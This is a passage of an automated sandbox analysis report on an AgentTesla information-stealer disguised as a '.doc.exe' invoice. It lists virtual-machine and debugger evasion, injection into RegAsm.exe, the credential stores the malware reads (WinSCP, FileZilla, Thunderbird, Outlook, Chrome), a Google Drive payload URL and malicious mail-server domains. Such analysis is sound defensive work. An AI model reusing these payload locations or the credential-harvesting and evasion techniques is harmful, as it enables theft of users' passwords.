Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: RegAsm.exe, 0000001B.00000002.5622662843.0000000000EF0000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32USERPROFILE=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1SPPHH_DRSUT3UES4UDZECLKCI9PQFISE
Source: Fra FAC-ES101-2107-03806.doc.exe, 00000000.00000002.1175805374.0000000002AD0000.00000004.00000001.sdmp, RegAsm.exe, 0000001B.00000002.5622662843.0000000000EF0000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: Fra FAC-ES101-2107-03806.doc.exe, 00000000.00000002.1175805374.0000000002AD0000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32USERPROFILE=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGASM.EXE\SYSWOW64\MSVBVM60.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGASM.EXE\SYSWOW64\MSVBVM60.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGASM.EXE\SYSWOW64\MSVBVM60.DLL

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4928

Thread sleep time: -2767011611056431s >= -30000s

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Window / User API: threadDelayed 9937

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe

System information queried: ModuleInformation

Jump to behavior

Source: Fra FAC-ES101-2107-03806.doc.exe, 00000000.00000002.1177269866.0000000004C19000.00000004.00000001.sdmp, RegAsm.exe, 0000001B.00000002.5630792884.0000000002B49000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: Fra FAC-ES101-2107-03806.doc.exe, 00000000.00000002.1177269866.0000000004C19000.00000004.00000001.sdmp, RegAsm.exe, 0000001B.00000002.5630792884.0000000002B49000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: RegAsm.exe, 0000001B.00000002.5630792884.0000000002B49000.00000004.00000001.sdmp	Binary or memory string: vmicshutdown
Source: Fra FAC-ES101-2107-03806.doc.exe, 00000000.00000002.1177269866.0000000004C19000.00000004.00000001.sdmp, RegAsm.exe, 0000001B.00000002.5630792884.0000000002B49000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: Fra FAC-ES101-2107-03806.doc.exe, 00000000.00000002.1177269866.0000000004C19000.00000004.00000001.sdmp, RegAsm.exe, 0000001B.00000002.5630792884.0000000002B49000.00000004.00000001.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: Fra FAC-ES101-2107-03806.doc.exe, 00000000.00000002.1177269866.0000000004C19000.00000004.00000001.sdmp, RegAsm.exe, 0000001B.00000002.5630792884.0000000002B49000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: Fra FAC-ES101-2107-03806.doc.exe, 00000000.00000002.1175805374.0000000002AD0000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32USERPROFILE=windir=\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe\syswow64\msvbvm60.dllwindir=\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe\syswow64\msvbvm60.dllwindir=\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe\syswow64\msvbvm60.dll
Source: RegAsm.exe, 0000001B.00000002.5630792884.0000000002B49000.00000004.00000001.sdmp	Binary or memory string: vmicvss
Source: RegAsm.exe, 0000001B.00000002.5623186100.000000000107A000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: RegAsm.exe, 0000001B.00000002.5624448951.00000000010EF000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAWf
Source: RegAsm.exe, 0000001B.00000002.5622662843.0000000000EF0000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32USERPROFILE=https://drive.google.com/uc?export=download&id=1sPphH_DrSUT3UeS4UDzeclKCi9pqFiSe
Source: Fra FAC-ES101-2107-03806.doc.exe, 00000000.00000002.1175805374.0000000002AD0000.00000004.00000001.sdmp, RegAsm.exe, 0000001B.00000002.5622662843.0000000000EF0000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: Fra FAC-ES101-2107-03806.doc.exe, 00000000.00000002.1177269866.0000000004C19000.00000004.00000001.sdmp, RegAsm.exe, 0000001B.00000002.5630792884.0000000002B49000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: Fra FAC-ES101-2107-03806.doc.exe, 00000000.00000002.1177269866.0000000004C19000.00000004.00000001.sdmp, RegAsm.exe, 0000001B.00000002.5630792884.0000000002B49000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: Fra FAC-ES101-2107-03806.doc.exe, 00000000.00000002.1177269866.0000000004C19000.00000004.00000001.sdmp, RegAsm.exe, 0000001B.00000002.5630792884.0000000002B49000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: RegAsm.exe, 0000001B.00000002.5630792884.0000000002B49000.00000004.00000001.sdmp	Binary or memory string: vmicheartbeat

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread information set: HideFromDebugger			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 27_2_00C46948 KiUserExceptionDispatcher,LdrInitializeThunk,

27_2_00C46948

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: D00000

Jump to behavior

Source: C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe'	Jump to behavior
Source: C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe'	Jump to behavior
Source: C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe'	Jump to behavior

Source: RegAsm.exe, 0000001B.00000002.5629686618.00000000016F1000.00000002.00020000.sdmp	Binary or memory string: Program Managerh
Source: RegAsm.exe, 0000001B.00000002.5629686618.00000000016F1000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: RegAsm.exe, 0000001B.00000002.5629686618.00000000016F1000.00000002.00020000.sdmp	Binary or memory string: Progman

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 0000001B.00000002.5639470864.000000001DD61000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2796, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior

Source: Yara match	File source: 0000001B.00000002.5639470864.000000001DD61000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2796, type: MEMORYSTR

Remote Access Functionality:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 0000001B.00000002.5639470864.000000001DD61000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2796, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation211	DLL Side-Loading1	Process Injection112	Masquerading11	OS Credential Dumping2	Query Registry1	Remote Services	Email Collection1	Exfiltration Over Other Network Medium	Encrypted Channel21	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	DLL Side-Loading1	Disable or Modify Tools1	Credentials in Registry1	Security Software Discovery421	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion341	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Local System2	Automated Exfiltration	Ingress Tool Transfer1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection112	NTDS	Virtualization/Sandbox Evasion341	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information11	LSA Secrets	Application Window Discovery1	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol23	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Software Packing1	Cached Domain Credentials	File and Directory Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	DLL Side-Loading1	DCSync	System Information Discovery115	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Fra FAC-ES101-2107-03806.doc.exe	62%	Virustotal		Browse
Fra FAC-ES101-2107-03806.doc.exe	34%	Metadefender		Browse
Fra FAC-ES101-2107-03806.doc.exe	54%	ReversingLabs	Win32.Trojan.AgentTesla
Fra FAC-ES101-2107-03806.doc.exe	100%	Avira	TR/AD.Nekark.gblpr

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.0.Fra FAC-ES101-2107-03806.doc.exe.400000.0.unpack	100%	Avira	TR/AD.Nekark.gblpr		Download File

Domains

Source	Detection	Scanner	Link
tccinfaes.com	3%	Virustotal	Browse
mail.tccinfaes.com	11%	Virustotal	Browse
x1.i.lencr.org	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://mail.tccinfaes.com	11%	Virustotal		Browse
http://mail.tccinfaes.com	100%	Avira URL Cloud	malware
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
http://x1.i.lencr.org/	0%	Virustotal		Browse
http://x1.i.lencr.org/	0%	Avira URL Cloud	safe
http://DynDns.comDynDNS	0%	Avira URL Cloud	safe
http://L3TFBaO3nLwUP4KRw.comt-	0%	Avira URL Cloud	safe
http://cps.letsencrypt.org0	0%	Avira URL Cloud	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	Avira URL Cloud	safe
http://x1.c.lencr.org/0	0%	Avira URL Cloud	safe
http://x1.i.lencr.org/0	0%	Avira URL Cloud	safe
http://tccinfaes.com	0%	Avira URL Cloud	safe
http://aSuCYu.com	0%	Avira URL Cloud	safe
http://r3.o.lencr.org0	0%	Avira URL Cloud	safe
http://r3.i.lencr.org/0)	0%	Avira URL Cloud	safe
http://L3TFBaO3nLwUP4KRw.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
tccinfaes.com	188.93.227.195	true	true	3%, Virustotal, Browse	unknown
drive.google.com	142.250.185.174	true	false		high
googlehosted.l.googleusercontent.com	142.250.185.161	true	false		high
doc-04-ak-docs.googleusercontent.com	unknown	unknown	false		high
mail.tccinfaes.com	unknown	unknown	true	11%, Virustotal, Browse	unknown
x1.i.lencr.org	unknown	unknown	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
